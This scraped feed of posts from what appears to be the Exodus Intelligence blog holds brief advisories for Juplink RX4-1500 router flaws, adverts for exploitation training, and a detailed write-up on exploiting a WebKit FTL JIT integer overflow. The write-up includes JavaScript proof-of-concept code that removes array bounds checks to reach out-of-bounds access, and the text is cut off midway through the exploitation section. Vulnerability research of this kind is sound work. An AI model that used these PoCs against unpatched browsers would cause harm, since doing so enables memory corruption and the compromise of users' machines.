Normal view

There are new articles available, click to refresh the page.
Before yesterdayExodus Intelligence

Juplink RX4-1500 Hard-coded Credential Vulnerability

18 September 2023 at 17:52

EIP-6a41336a

Hard coded credentials exists in Juplink RX4-1500, a WiFi router. An unauthenticated attacker can exploit this vulnerability to log into the web interface or telnet service as the ‘user’ user.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-6a41336a
  • MITRE: CVE-2023-41030

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:N/C:P/I:P/A:P
  • CVSSv2 Score: 5.8

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 Hard-coded Credential Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 Command Injection Vulnerability

18 September 2023 at 17:46

EIP-9f56ea7e

A command injection exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-9f56ea7e
  • MITRE: CVE-2023-41029

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 Command Injection Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 homemng Command Injection Vulnerability

18 September 2023 at 17:30

EIP-57838768

A command injection vulnerability exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-57838768
  • MITRE: CVE-2023-41031

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 homemng Command Injection Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 Credential Disclosure Vulnerability

18 September 2023 at 17:23

EIP-3fd79566

A credential disclosure vulnerability exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-3fd79566
  • MITRE: CVE-2023-41027

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: July 30, 2020
  • Disclosed to public: September 18, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

The post Juplink RX4-1500 Credential Disclosure Vulnerability appeared first on Exodus Intelligence.

Juplink RX4-1500 Stack-based Buffer Overflow Vulnerability

23 August 2023 at 21:36

EIP-b5185f25

A stack-based buffer overflow exists in Juplink RX4-1500, a WiFi router. An authenticated attacker can exploit this vulnerability to achieve code execution as root.

Vulnerability Identifiers

  • Exodus Intelligence: EIP-b5185f25
  • MITRE: CVE-2023-41028

Vulnerability Metrics

  • CVSSv2 Vector: AV:A/AC:L/Au:S/C:C/I:C/A:C
  • CVSSv2 Score: 7.7

Vendor References

  • The affected product is end-of-life and no patches are available.

Discovery Credit

  • Exodus Intelligence

Disclosure Timeline

  • Vendor response to disclosure: August 21, 2021
  • Disclosed to public: August 23, 2023

Further Information

Readers of this advisory who are interested in receiving further details around the vulnerability, mitigations, detection guidance, and more can contact us at [email protected].

Researchers who are interested in monetizing their 0day and Nday can work with us through our Research Sponsorship Program (RSP).

The post Juplink RX4-1500 Stack-based Buffer Overflow Vulnerability appeared first on Exodus Intelligence.

Public Mobile Exploitation Training – Fall 2023

4 August 2023 at 16:08

Mobile Exploitation Training

We are pleased to announce that the researchers of Exodus Intelligence will be providing publicly available training in person on November 14 2023 in London, England.

This 4 day course is designed to provide students with both an overview of the Android attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, binary instrumentation, and advanced exploitation of widely deployed mobile platforms.

Taught by Senior members of the Exodus Intelligence Mobile Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands on with privilege escalation techniques within the Android Kernel, mitigations and execution migration issues with a focus on MediaTek chipsets.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 1GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ARM ASM fluency strongly recommended.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python 2.7+.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates: November 14-17, 2023

Location: the London, UK area

Syllabus

Android Kernel

 

  • Process Management
    • General overview
    • Important structures
  • Kernel synchronization
  • Memory Management
    • General overview
    • Virtual memory
    • Memory allocators
  • Debugging environment
    • Build the kernel
    • Boot and Root the kernel
    • Kernel debugging
    • demo
  • SELinux
  • Samsung Knox/RKP
  • Type of kernel vulnerabilities
    • Exploitation primitives
    • kernel vulnerabilities overview
    • heap overflows, UAF
    • Info leakage
  • [CVE-various] Mali GPU bug
    • Mali GPU
    • Vulnerability overview
    • Exploitation
  • [CVE-2020-0466] double-free vulnerability
    • Vulnerability overview
    • Exploitation
      • type confusion to write access to globally shared memory
      • UAF which can lead to arbitrary read and write of kernel memory
    • [CVE-2021-22600] double-free vulnerability
      • Vulnerability overview
      • Exploitation – convert the double free into a use-after-free of a struct page

 

Mediatek / Exynos baseband

  • Introduction
    • exynos baseband overview
    • mediatek baseband overview
  • Environment
  • Previous researches
  • Analyze modem
  • Emulation / Fuzzing
  • Rogue base station
  • secure boot
  • mediatek boot rom vulnerability
    • Vulnerability overview
    • Exploitation
  • baseband debugger
    • use brom exploit to patch the tee
    • write the modem physical memory from EL1

 

The post Public Mobile Exploitation Training – Fall 2023 appeared first on Exodus Intelligence.

Public Browser Exploitation Training – Fall 2023

4 August 2023 at 16:05

Browser Exploitation Training

We are pleased to announce that the researchers of Exodus Intelligence will be providing publicly available training in person on November 14 2023 in London, England.

This 4 day course is designed to provide students with both an overview of the current state of the browser attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, and advanced exploitation of widely deployed browsers such as Google Chrome and Apple Safari.

Taught by Senior members of the Exodus Intelligence Browser Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands on with privilege escalation techniques within the JavaScript implementations, JIT optimizers and rendering components.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64, recommended 1GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ASM fluency.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python 2.7+.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates:  November 14-17, 2023

Location:  the London, UK area

Syllabus

  • JavaScript Crash Course
  • Browsers Overview
    • Architecture
    • Renderer
    • Sandbox
  • Deep Dive into JavaScript Engines and JIT Compilation
    • Detailed understanding of JavaScript engines and JIT compilation
    • Differences between major JavaScript engines (V8, SpiderMonkey, JavaScriptCore)
  • Introduction to Browser Exploitation
    • Technical aspects and techniques of browser exploitation
    • Focus on JavaScript engine and JIT vulnerabilities
  • Chrome ArrayShift case study
  • Safari NaN Speculation case study
  • JIT Compilers in depth
    • Chrome/V8 Turbofan
    • Firefox/SpiderMonkey Ion
    • Safari/JavaScriptCore DFG/FTL
  • Chrome ArrayShift case study exploitation
    • Object in-memory layout
  • Types of Arrays
  • Chrome ArrayShift case study exploitation continued
    • Garbage collection
  • Running shellcode
    • Common avenues
    • Mitigations
  • Browser Fuzzing and Bug Hunting
    • Introduction to fuzzing
    • Pros and cons of fuzzing
    • Fuzzing techniques for browsers
    • “Smarter” fuzzing
  • Current landscape
  • Hands-on exercises throughout the course
    • Understanding the environment and getting up to speed
    • Analysis and exploitation of a vulnerability

The post Public Browser Exploitation Training – Fall 2023 appeared first on Exodus Intelligence.

Shifting boundaries: Exploiting an Integer Overflow in Apple Safari

20 July 2023 at 18:45

By Vignesh Rao

Overview

In this blog post, we describe a method to exploit an integer overflow in Apple WebKit due to a vulnerability resulting from incorrect range computations when optimizing Javascript code. This research was conducted along with Martin Saar in 2020.

We show how to convert this integer overflow into a stable out-of-bounds read/write on the JavaScriptCore heap. We then show how to use the out-of-bounds read/write to create addrof and fakeobj primitives

Table of Contents

Introduction

Heavy JavaScript use is common in modern web applications, which can quickly bog down performance. To tackle this issue, most web browser engines have added a Just-In-Time (JIT) compiler to compile hot (i.e. heavily used) JavaScript code to assembly. The JIT compiler relies on information collected by the interpreter when running JavaScript code.

The three most common browser vendors have at least two JIT compilers, one of them being a non-optimizing baseline compiler performing little to no optimization and the other being an optimizing compiler applying heavy optimization to the JavaScript code during compilation.

The WebKit browser engine, used by the Safari browser, has three JIT compilers, namely the baseline compiler, the DFG (Data Flow Graph) compiler, and the FTL (Faster Than Light) compiler. The DFG and FTL are optimizing compilers that operate on special intermediate representations of the target JavaScript source. For this post, we will be focusing on the FTL JIT compiler.

From the post Speculation in JavaScript:

The FTL JIT, or faster than light JIT, which does comprehensive compiler optimizations. It’s designed for peak throughput. The FTL never compromises on throughput to improve compile times. This JIT reuses most of the DFG JIT’s optimizations and adds lots more. The FTL JIT uses multiple IRs (DFG IR, DFG SSA IR, B3 IR, and Assembly IR).

The above-linked article, written by a WebKit developer, describes clearly various JIT concepts in JavaScriptCore, the JavaScript engine within WebKit. Its length is more than matched by the insight it provides.

Pre-requisites

Before diving into the vulnerability details, we will cover a few concepts required to understand the vulnerability better. If you are already familiar with these, feel free to skip this section.

Tiers of Execution in JSC

As mentioned before, all modern browsers have at least 2 tiers of execution – the interpreter and the JIT compiler. Each tier operates on a specific representation of the code. For example, the interpreter works with the bytecode, while the JIT compilers typically work with a lower-level intermediate representation. The following are the tiers of execution in JavaScriptCore:

  • The Low Level Interpreter (LLINT): This is the first tier of execution in the engine operating on the bytecode directly. LLINT is unique as it is written in a custom assembly language called “offlineasm”. This is the slowest tier of execution but accounts for all possible cases that can arise.
  • The Baseline JIT: This is the second tier of execution. It is a template JIT compiler that compiles the bytecode into native assembly without many optimizations. It is faster than the interpreter but slower than other JIT tiers due to a lack of optimizations.
  • The Data Flow Graph (DFG) JIT: This is the third tier of execution. It lowers the bytecode into an intermediate representation called DFG IR. It then uses this IR to perform optimizations. The goal of the DFG JIT is to balance compilation time with the performance of the generated native code. Hence while performing important optimizations, it skips most other optimizations to generate code quickly.
  • The Faster Than Light (FTL) JIT: This is the fourth tier of execution and operates on the DFG IR as well as other IRs called the B3 IR and AIR. The goal of this compiler is to generate code that runs extremely fast while compromising on the speed of compilation. It first optimizes the DFG IR and then lowers it into B3 IR for more optimizations. Next, FTL lowers B3 IR into AIR which is then used to generate the native code.

The following figure highlights the tiers of execution with the code representation they use.

JavaScriptCore Tiers and Code Representations

B3 Strength Reduction Phase

The strength reduction phase for the B3 IR is a large phase that handles things like constant folding and range analysis along with the actual strength reduction. This phase is defined in the Source/JavaScriptCore/b3/B3ReduceStrength.cpp file. One of the relevant classes used in this phase is the class IntRange with two member variables m_min and m_max.

				
					// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp

class IntRange {
public:
    ....
private:
    int64_t m_min { 0 };
    int64_t m_max { 0 };
};
				
			

Objects of IntRange type are used to represent integer ranges for B3 nodes with integer values. For example, the Add node in the B3 IR represents the result of the addition of its two operands. An instance of IntRange can be used to represent the range of the Add node, meaning the range of the addition result.

The m_min and m_max members are used to hold the minimum and the maximum values of the range, respectively. For example, if there is an Add node with a result that lies between [0, 100], then the result range can be represented with an IntRange object with m_min as 0 and m_max as 100. If you have worked with v8’s Turbofan, this will be reminiscent of the Typer Phase. If the range of a node cannot be determined, then it is assigned the top range, which is a range that encompasses the minimum and the maximum values of the given type. Hence, for a node with an int32 result, the top range would be [INT_MIN, INT_MAX]. The IntRange class has a generic function called top(), which returns an IntRange instance that covers the entire range for a given type.

The IntRange class has a number of methods that allow operations on ranges. For example, the add() method takes another range as an argument and returns the result of adding the two ranges as a new range. Only specific math operations are supported currently, which include bitwise left/right shifts, bitwise and, add, sub, and mul, among others.

We now know how ranges are represented. But who assigns ranges to nodes? For this, there is a function called rangeFor() in the strength reduction phase.

				
					// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp

IntRange rangeFor(Value* value, unsigned timeToLive = 5) {

[1] 
    
    if (!timeToLive)
        return IntRange::top(value-﹥type());
    switch (value-﹥opcode()) {
    
[2]
    
    case Const32:
    case Const64: {
        int64_t intValue = value-﹥asInt();
        return IntRange(intValue, intValue);
    }

[TRUNCATED]

[3]
    
    case Shl:
        if (value-﹥child(1)-﹥hasInt32()) {
            return rangeFor(value-﹥child(0), timeToLive - 1).shl(
                value-﹥child(1)-﹥asInt32(), value-﹥type());
        }
        break;

[TRUNCATED]

    default:
        break;
    }

    return IntRange::top(value-﹥type());
}
				
			

The above snippet shows a stripped-down version of the rangeFor() function. This function accepts a Value, which is the B3 speak for a node, and an integer timeToLive as arguments. If the timeToLive argument is zero, then it returns the top range for the node. Otherwise, it proceeds to calculate the range of the node based on the node opcode in a switch case. For example, if it’s a constant node, then the range of that node is calculated by creating an IntRange with the min and max values set to the constant value.

For nodes with more complex functionality, like those that have operands, there arises the need to first find out the range of the operand. The rangeFor() function often calls itself recursively in such cases. At [3], for example, the range calculation for the shift left operation node is shown. The shl node has 2 operands – the value to be shifted and the value that specifies the shift amount. In the rangeFor() function, the range is only calculated if the shift amount is a constant. First, the range of the value that is to be shifted is found by calling the rangeFor() function on the operand of the shift left node. We can see that when this function is recursively called, the timeToLive value is decremented by one. This is done to avoid infinite recursion as the top value is returned when timeToLive is zero. Once the range of the operand is found, the shl operation is performed on the range by calling the shl() method of the IntRange class. The shift amount and the type of the operand are passed to the function as arguments. This function will return the range of the shl node based on the value to be shifted and the shift amount.

The rangeFor() function only supports a few nodes under specific cases, like the constant shift amount case for the shl node. For all other nodes and cases, the topvalue is returned.

The next question that arises is how these ranges are used. The first thought that comes to mind is that it might be used for bounds check elimination. However, that is not the case in this phase. Bounds checks are eliminated in the FTL Integer Range Optimization phase, which works with the higher level DFG IR and has already run its course by the time we reach the b3 strength reduction phase. So let us look at where rangeFor() is used in the strength reduction phase. We see that the result of this range computation is used to simplify the following B3 nodes:

  1. CheckAdd – The arithmetic add operation with checks for integer overflows.
  2. CheckSub – The arithmetic subtract operation with checks for integer overflows.
  3. CheckMul – The arithmetic multiply operation with checks for integer overflows.

The code for simplifying the CheckSub node into its unchecked version (a simple Sub node without overflow checks) is shown in the following snippet. The other nodes are dealt with in a similar fashion.

				
					// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp

[1]

IntRange leftRange = rangeFor(m_value-﹥child(0));
IntRange rightRange = rangeFor(m_value-﹥child(1));

[2] 

if (!leftRange.couldOverflowSub(rightRange, m_value-﹥type())) {

[3]

    replaceWithNewValue(
        m_proc.add(Sub, m_value-﹥origin(), m_value-﹥child(0), m_value-﹥child(1)));
    break;
}
				
			

At [1], the ranges for the left and right operands of the CheckSub operation are computed. Then, at [2], the ranges are used to check if this CheckSub operation can overflow. If it cannot overflow, then the CheckSub is replaced with a simple Suboperation ([3]).

The same logic also applies to the CheckAdd and the CheckMul nodes. Hence we see that the range analysis is used to eliminate the integer overflow checks from the Addition, Subtraction, and Multiplication operations.

Vulnerability

The vulnerability is an integer overflow while calculating the range of an arithmetic left shift operation, in the strength reduction phase of the FTL (found in WebKit/Source/JavaScriptCore/b3/B3ReduceStrength.cpp). Let’s take a look at the following code snippet from the above-mentioned file:

				
					// File Name: Source/JavaScriptCore/b3/B3ReduceStrength.cpp
template﹤typename T﹥
IntRange shl(int32_t shiftAmount)
{
    T newMin = static_cast﹤T﹥(m_min) ﹤﹤ static_cast﹤T﹥(shiftAmount);
    T newMax = static_cast﹤T﹥(m_max) ﹤﹤ static_cast﹤T﹥(shiftAmount);

    if ((newMin ﹥﹥ shiftAmount) != static_cast﹤T﹥(m_min))
        newMin = std::numeric_limits﹤T﹥::min();
    if ((newMax ﹥﹥ shiftAmount) != static_cast﹤T﹥(m_max))
        newMax = std::numeric_limits﹤T﹥::max();

    return IntRange(newMin, newMax);
}
				
			

The shl() function is responsible for calculating the range of the shift left operation. As seen in the previous section, the m_min and m_max are class variables that hold the minimum and maximum value for a “variable”. We are referring to it as a variable here for simplicity, but this range is associated with the b3 node on which this operation is being performed. This function is called when there is a left shift operation on the variable. It updates the range (the m_min, m_max pair) of the variable to reflect the state after the left shift.

The logic used is simple. It first shifts the m_min value, which is the minimum value that the variable can have, by the shift amount to find the new minimum (stored in the newMin variable in the above snippet). It does the same with m_max. The function then performs a check for overflow. It right shifts the value and checks that it is equal to the old value before the left shift was done on the range. Keep in mind that the right shift is sign extended. Suppose that the original minimum before the left shift was 0x7fff_fff0, then after a left shift by one it will overflow into 0xffff_ffe0 (this is the negative number, -32, in hex). However, when this is again right shifted by 1, in the check for overflow on line 8, it is sign extended so the resulting value becomes 0xfffffff0 (the number -16 in hex). This is not equal to the original value, so the compiler knows that it overflowed and takes the conservative approach of setting the lower bounds to INT_MIN.

Even though overflow checks are performed, they are not sufficient.

Consider the example of an initial range of the input operand being [0, 0x7ffffffe] and the shift value of 1. The function detects that the upper bound may overflow and assigns the upper bound of the result as INT_MAX. However, it never changes the lower bound as the lower bounds cannot overflow (0<<1 = 0). Thus the range of the result value is calculated as [0,INT_MAX] where INT_MAX = 0x7fffffff. However, when the left shift is performed on the upper bound (0x7ffffffe) of the input range, it may overflow, become negative, and more importantly become smaller than the lower bound (0) of the input range. To wit, 0x7ffffffe<<1 = 0xfffffffc = -4. Thus the actual value, which is in the range [-4, INT_MAX], can fall outside the range computed by the FTL JIT, which is [0, INT_MAX].

Trigger

Now that we see what the bug is, we try to trigger it. For triggering it, we know that we need to call the range analysis on the shl opcode, which will be done if we use the result of the shift in some other operation like add, sub, or mul, that calls rangeFor() on its operands. Additionally, the shift amount is required to be a constant value; otherwise the top range is selected. Given the above constraints, a simple trigger can be constructed as follows:

				
					function jit(idx, times){
    // Inform the compiler that this is a number
    // with range [0, 0x7fff_ffff]
    let id = idx & 0x7fffffff;   
    // Bug trigger - This will overflow if id is large enough that
    // FTL thinks range is [0, INT_MAX]
    // Actual range is [INT_MIN, INT_MAX]
    let b = id ﹤﹤ 2;              
    
    // The sub calls `rangeFor` on its operands 
    return b-1;                    
}

function main(){
    // JIT compile the function with legitimate value to train the compiler
    for (let k=0; k﹤1000000; k++) { jit(k %10); } 
}

main()
				
			

Although the above PoC shows how to trigger the calculation of an incorrect range, it does not yet do anything else. Let us dump the B3 IR for the jit() function and check. In the jsc shell, the b3 IR can be dumped using the command line argument --dumpB3GraphAtEachPhase=true while running the shell. The “Reduce Strength” phase is called a few times in the b3 pipeline, so let us dump the IR and compare the graph immediately after generating the IR and after the last call to this phase. The relevant parts of the graph are shown below.

The following is the graph immediately after generating the IR:

				
					b3      Int32 b@132 = BitAnd(b@63, $2147483647(b@131), D@30)
...
b3      Int32 b@145 = Shl(b@132, b@144, D@34)
...
b3      Int32 b@155 = Const32(-1, D@44)
b3      Int32 b@156 = CheckAdd(b@145:WarmAny, $-1(b@155):WarmAny, b@145:ColdAny, generator = 0x7f297b0d9440, earlyClobbered = [], lateClobbered = [], usedRegisters = [], ExitsSideways|Reads:Top, D@38)
				
			

The b@132 node holds the result of the bit wise and that we added to tell the compiler that our input is an integer. The b@145 node is the result of the shl operation and the b@156 node the result of the add operation. The original code in the PoC calls return b-1. Here the compiler simplifies the subtraction into an addition by the time we got to the b3 phase. The addition is represented as a CheckAdd , which means that overflow checks are conducted for this add operation during codegen.

Below is the graph after the last call to the Strength Reduction Phase:

				
					b3      Int32 b@132 = BitAnd(b@63, $2147483647(b@131), D@30)
b3      Int32 b@27 = Const32(2, D@33)
b3      Int32 b@145 = Shl(b@132, $2(b@27), D@34)
b3      Int32 b@155 = Const32(-1, D@44)
b3      Int32 b@26 = Add(b@145, $-1(b@155), D@38)
				
			

Most steps are the same except for the last line: the CheckAdd operation was reduced to a simple Add operation, which lacks overflow checks during codegen. This substitution should not have happened as this operation can theoretically overflow and hence should require overflow checks. Therefore, based on this IR we can see that the bug is triggered.

Due to the incorrect range computation in the shl() function, the CheckAdd node incorrectly determines that the subtraction operation cannot overflow and drops the overflow checks to convert the node into an ordinary Add node. This can lead to an integer overflow vulnerability in the generated code. This gives us a way to convert the range overflow into an actual integer overflow in the JIT-ed code. Next, we will see how this can be leveraged to get a controlled out-of-bounds read/write on the JavaScriptCore heap.

Exploitation

To exploit this bug, we first try to convert the possible integer overflow into an out-of-bounds read/write on a JavaScript Array. After we get an out-of-bounds read/write, we create the addrof and fakeobj primitives. We need some knowledge of how objects are represented in JavaScriptCore. However, this has already been covered in detail by many others, so we will skip it for this post. If you are unfamiliar with object representation in JSC, we urge you to check out LiveOverflow’s excellent blogs on WebKit and the “Attacking JavaScript Engines” Phrack article by Samuel Groß.

We start by covering some concepts on the DFG.

DFG Relationships

In this section, we dive deeper into how DFG infers range information for nodes. It is not necessary to understand the bug, but it allows for a deeper understanding of the concept. If you do not feel like diving too deep, then feel free to skip to the next section. You will still be able to understand the rest of the post.

As mentioned before, JSC has 3 JIT compilers: the baseline JIT, the DFG JIT, and the FTL JIT. We saw that this vulnerability lies in the FTL JIT code and occurs after the DFG optimizations are run. Since the incorrect range is only used to reduce the “checked” version of Add, Sub and Mul nodes and never used anywhere else, there is no way of eliminating a bounds check in this phase. Thus it is necessary to look into the DFG IR phases, which take place prior to the code being lowered to B3 IR, for ways to remove bounds checks.

An interesting phase for the DFG IR is the Integer Range Optimization Phase (WebKit/Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp), which attempts to optimize certain instructions based on the range of their input operands. Essentially, this phase is only executed in the FTL compiler and not in the DFG compiler, but since it operates on the DFG IR, we refer to this as a DFG phase. This phase can be considered analogous to the “Typer phase” in Turbofan, the Chrome JIT compiler, or the “Range Analysis Phase” in IonMonkey, the Firefox JIT compiler. The Integer Range Optimization Phase is fairly complex overall, therefore only details relevant to this exploit are discussed here.

In the Integer Range Optimization phase, the range of a variety of nodes are computed in terms of Relationship class objects. To clarify how the Relationship objects work, let @a, @b, and @c be nodes in the IR. If @a is less than @b, it is represented in the Relationship object as @a < @b + 0. Now, this phase may encounter another operation on the node @a, which results in the relationship @a > @c + 5. The phase keeps track of all such relationships, and the final relationship is computed by a logical and of all the intermediate relationships. Thus, in the above case, the final result would be @a > @c + 5 && @a < @b + 0.

In the case of the CheckInBounds node, if the relationship of the index is greater than zero and less than the length, then the CheckInBounds node is eliminated. The following snippet highlights this.

				
					// File Name: Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp
// WebKit svn changeset: 266775

case CheckInBounds: {
    auto iter = m_relationships.find(node-﹥child1().node());
    if (iter == m_relationships.end())
        break;

    bool nonNegative = false;
    bool lessThanLength = false;
    for (Relationship relationship : iter-﹥value) {
        if (relationship.minValueOfLeft() ﹥= 0)
            nonNegative = true;

        if (relationship.right() == node-﹥child2().node()) {
            if (relationship.kind() == Relationship::Equal
                && relationship.offset() ﹤ 0)
                lessThanLength = true;

            if (relationship.kind() == Relationship::LessThan
                && relationship.offset() ﹤= 0)
                lessThanLength = true;
        }
    }

    if (DFGIntegerRangeOptimizationPhaseInternal::verbose)
        dataLogLn("CheckInBounds ", node, " has: ", nonNegative, " ", lessThanLength);

    if (nonNegative && lessThanLength) {
        executeNode(block-﹥at(nodeIndex));
        // We just need to make sure we are a value-producing node.
        node-﹥convertToIdentityOn(node-﹥child1().node());
        changed = true;
    }
    break;
}
				
			

The CompareLess node sets the relationship to @a < @b + 0 where @a is the first operand of the compare operation and @b is the second operand. If the second operand is array.length, where array is any JavaScript array, then this will set the value of the @a node to be less than the length of the array. The following snippet shows the corresponding code in the phase.

				
					// File Name: Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp
// WebKit svn changeset: 266775

case CompareLess:
    relationshipForTrue = Relationship::safeCreate(
        compare-﹥child1().node(), compare-﹥child2().node(),
        Relationship::LessThan, 0);
    break;
				
			

A similar case happens for the CompareGreater node, which can be used to satisfy the second condition for removing the check bounds node, namely if the value is greater than zero.

Our vulnerability is basically an addition/subtraction operation without overflow checks. Therefore, it would be interesting to take a look at how the range for the ArithAdd DFG node (which will be lowered to CheckAdd/CheckSub nodes when DFG is lowered to B3 IR) is calculated. This is far more complicated than the previous cases, so some relevant parts and code are discussed.

The following code shows the initial logic of computing the ranges for the ArithAdd node.

				
					// File Name: Source/JavaScriptCore/dfg/DFGIntegerRangeOptimizationPhase.cpp
// WebKit svn changeset: 266775

// Handle add: @value + constant.
if (!node-﹥child2()-﹥isInt32Constant())
    break;

int offset = node-﹥child2()-﹥asInt32();

// We add a relationship for @add == @value + constant, and then we copy the
// relationships for @value. This gives us a one-deep view of @value's existing
// relationships, which matches the one-deep search in setRelationship().

setRelationship(
    Relationship(node, node-﹥child1().node(), Relationship::Equal, offset));
				
			

As the comment says, if the statement is something like let var2 = var1 + 4, then the Relationship for var2 is initially set as @var2 = @var1 + 4. Further down, the Relationship for var1 is used to calculate the precise range for var2 (the result of the ArithAdd operation). Thus, with the code in the JavaScript snippet highlighted below, the range of the add variable, which is the result of the add operation, is determined as (4, INT_MAX). Due to the CompareGreater node, DFG already knows that num is in the range (0, INT_MAX) and therefore, after the add operations, it becomes (4, INT_MAX).

				
					function jit(num){
    if (num ﹥ 0){
        let add = num + 4;
        return add;
    }
}
				
			

Similarly, an upper range can be enforced by introducing a CompareLess node that compares with an array length as shown below.

				
					function jit(num){
    let array = [1,2,3,4,5,6,7,8,9,10];
    if (num ﹥ 0){
        let add = num + 4;
        if (add ﹤ array.length){
        
[1]
            return array[add];
        }
    }
}
				
			

Thus in this code, the range of the add variable at [1] is (0, array.length) which is in bounds of the array and thus the bounds check is removed.

Abusing DFG to eliminate the Bounds Check

In summary, if we have the following code:

				
					function jit(num){
    num = num | 0;
    let array = [1,2,3,4,5,6,7,8,9,10];
    if (num ﹥ 0){                          // [1]
        let add = num + 4;                  // [2]
        if (add ﹤ array.length){           // [3]
            return array[add];              // [4]
        }
    }
}
				
			

At [2], DFG knows that the variable add is greater than 0 due to it passing the check at [1]. Similarly, at [4] it knows that the add variable is less than array.length due to it passing the check at [3]. Putting both of these together, DFG can see that the addvariable is greater than zero and less than array.length when the execution reaches [4], where the element with index add is retrieved from the array. Thus DFG can safely say that the range of add at [4] is [4, array.length]; it removes the bounds check as it assumes that the check will always pass. Now, what would happen if an integer overflow happens on [2], where add is calculated as num + 4? DFG relies on the fact that all these arithmetic operations are checked for an overflow and if an overflow happens, the code will bail out of the JIT-compiled code. This is the assumption that we want to break.

Now that the bounds check has successfully been removed by DFG, triggering the bug will be a whole lot easier. Let’s dig in!

FTL will convert the DFG IR into the B3 representation and perform various optimizations. One of the early optimizations is strength reduction, which performs a variety of optimizations like constant folding, simple common sub-expression elimination, simplifying nodes to a lower form (eg – CheckSub -> Sub), etc. The code in the following snippet shows a simple and unstable proof of concept for triggering the bug.

				
					function jit(idx){
    // The array on which we will do the oob access
    let a = [1,2,3,4,5,6,7,8,9,0,12,3,4,5,6,7,8,9,23,234,423,234,234,234]; 

[1]
    // Inform the compiler that this is a number 
    // with range [0, 0x7fff_ffff]
    let id = idx & 0x7fffffff;  
    
[2]
    // Bug trigger - This will overflow if id is large enough. 
    // FTL thinks range is [0, INT_MAX], Actual range is [INT_MIN, INT_MAX]
    let b = id ﹤﹤ 2;   
    
[3]
    // Tell DFG IR that b is less than array length. 
    // According to DFG, b is in [INT_MIN, array.length)
    if (b ﹤ a.length){            
    
[4]
        // On exploit run - convert the overflowed value 
        // into a positive value. 
        let c = b - 0x7fffffff;  
        
[5]
        // force jit else dfg will update with osrExit
        if (c ﹤ 0) c = 1;   
        
[6]
        // Tell DFG that 'c' ﹥ 0. It already knows c is less than array.length. 
        if (c ﹥ 0){          
        
[7]
            // DFG thinks that c is inbounds, range = [0, array.length). 
            // Thus it removes bounds check and this is oob
            return a[ c ];          
        }
        else{
            return [ c ,1234]
        }
    }
    else{
        return 0x1337
    }
}

function main(){

    // JIT compile the function with legitimate value 
    // to train the compiler
    for (let k=0; k﹤1000000; k++){jit(k %10);}  
    
    // Trigger the bug by passing the argument as 0x7fff_ffff 
    print(jit(2147483647))                       
}
main()
				
			

The above PoC is just a modification of what was discussed at the start of this section. As before, there is no CheckInBounds node for the array load at [7].

Note that the DFG compiler thinks that the code at [4], b - 0x7ffffff, will never overflow because DFG assumes that this operation is checked, and thus an overflow would cause a bail out from the JIT code.

